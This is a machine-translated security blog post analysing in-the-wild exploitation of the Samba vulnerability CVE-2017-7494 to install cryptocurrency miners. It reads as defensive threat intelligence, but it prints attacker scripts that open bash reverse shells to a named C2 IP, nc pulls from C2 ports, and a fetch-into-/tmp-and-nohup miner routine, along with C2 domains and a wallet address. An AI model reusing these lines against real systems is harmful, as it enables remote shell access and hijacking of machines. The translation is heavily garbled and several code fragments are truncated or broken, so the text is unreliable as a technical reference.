“2017 5 May 24, Samba released a 4. 6. 4 version, in the middle fix a serious remote code execution vulnerability, the vulnerability number CVE-2017-7494, the vulnerability affects Samba 3.5.0 after to 4. 6. 4/4. 5. 10/4. 4. 14 in the middle of all versions.

SambaCry vulnerability is a scale spread of the worm nature of the vulnerability, the recent Kaspersky Security lab by the honeypot to capture a SambaCry vulnerability to malicious use bot to block even the digital currency bitcoin mining of the attack.

Exploit
Because the vulnerability requires the smb shared drive letter has to be written permission from the Kaspersky Lab honeypot to capture the attack packets point of view, the attacker first the server attempts to write to a random character name of the file, after the success of the deletion.
! [](/Article/UploadPic/2017-6/201761320335502. png? www. myhack58. com)
In the detection of the successful have write permissions, the attacker violence guess write the file’s full path to get the shared directory path, and write a malicious lib as a payload in.
! [](/Article/UploadPic/2017-6/201761320335906. png? www. myhack58. com)
In blasting to the correct path, then use CVE-2017-7494 vulnerability to load a malicious lib execute the command, because the samba default is root permissions to start, so after loading the lib command executed with root permissions, execute, and successfully exploited, then delete write the lib, only in memory to perform malicious command operation.
Malicious lib sample 349d84b3b176bbc9834230351ef3bc2a_16106. so(INAebsGB. so)and 2009af3fed2a4704c224694dfc4b31dc_30361. so(cblRWuoCc. so)
Sample analysis
In INAebsGB. so, the attacker with/bin/sh to perform a very simple rally a shell operation, so execute the downloaded file or execute subsequent commands.
! [](/Article/UploadPic/2017-6/201761320335566. png? www. myhack58. com)
Found this lib is actually metasploit is_known_pipename module generated.
Thereafter, the write another libcblRWuoCc. so, in this lib, the attacker, bounce the shell to the C2 Server 4000 port and download a mining program, the bot as the CPU miner to use with this sample, we positioned the C2 server and the mining program.
! [](/Article/UploadPic/2017-6/201761320335500. png? www. myhack58. com)
! [](/Article/UploadPic/2017-6/201761320335277. png? www. myhack58. com)
To perform acts of:

bash-i
Attacker Download http://rc. ezreal. space/minerd64_s and stored in/tmp/m to give permission after the nohup execution.
Simple to the C2 Server query as follows:
rc. ezreal. space
A record 149.255.35.33
Time IP country Province / the state operator
2017-05-17 149.255.35.33 Illinois, USA swiftway.net
2017-05-15 149.255.35.33 Illinois, USA swiftway.net
2017-04-30 185.86.150.76 Sweden Ciotat Poland
www.ezreal.space 191.101.31.100
cl. ezreal. space 191.101.31.100
rc2. ezreal. space 149.255.35.77
rc. ezreal. space 149.255.35.33
typo hacker?
In my connection C2 the server rc. ezreal. space4000 port, see the following script:
#!/ usr/bin/env bash
host=‘149.255.35.33’;
nohup bash-i
nohuo bash-i
nohuo bash-i
Attacker the Want nohup to ignore the system hang up for running in the background, but do not know if the careless hand shake the reason, nohup play into nohuo
To access the other three ports, give it a few script:
➜ /tmp nc 149.255.35.33 4001
#!/ usr/bin/env bash
#minerd script
host=‘149.255.35.33’;
target=$RANDOM; target+=. so; target=/tmp/$target;
cat $target && chmod +x $target && nohup $target &
➜ /tmp nc 149.255.35.33 4002
#!/ usr/bin/env bash

process guard script

➜ /tmp nc 149.255.35.33 4003
#!/ usr/bin/env bash

auto start script%

C2 port 5000 to get to the miner program and from http in download get consistent
miner analysis
Until now, the C2 server is still survival, download minerd64_s and simple analysis, found that is a common CPU mining program miderd but the attacker did not like the common additional parameters, but all parameters are hard-coded into the program puts the need to perform parameters.
! [](/Article/UploadPic/2017-6/201761320335961. png? www. myhack58. com)
! [](/Article/UploadPic/2017-6/201761320335667. png? www. myhack58. com)
Here soon found the attacker’s mining pool and wallet address:
. rodata:0000000000515604 00000026 C stratum+tcp://xmr. crypto-pool. fr:3333
. rodata:00000000005156CC 00000060 C 43xtViRHn1oibjS6yZSgS6XhFFkSRGC5shgmymh6ei4r5osjprc1z85beczs89ztl4idgdouheoktcve115wp7sb6xzhmgy
By mining pool Transaction query, that the attacker-dug is a cottage currency’XDN’and’XMR’, view recent into the case, found that the earnings also nice:)
Another attack
The thought that at this point our analysis and the Kaspersky difference not ready to come home from work, but found 360 tracking team also provides a sample of the 1bb17e0d03ebd5acafbe60b70e38dec4. so(oooo. so)
The lib and cblRWuoCc. so very similar, but the execution of the operation is not the same
! [](/Article/UploadPic/2017-6/201761320335339. png? www. myhack58. com)

[1] [2] next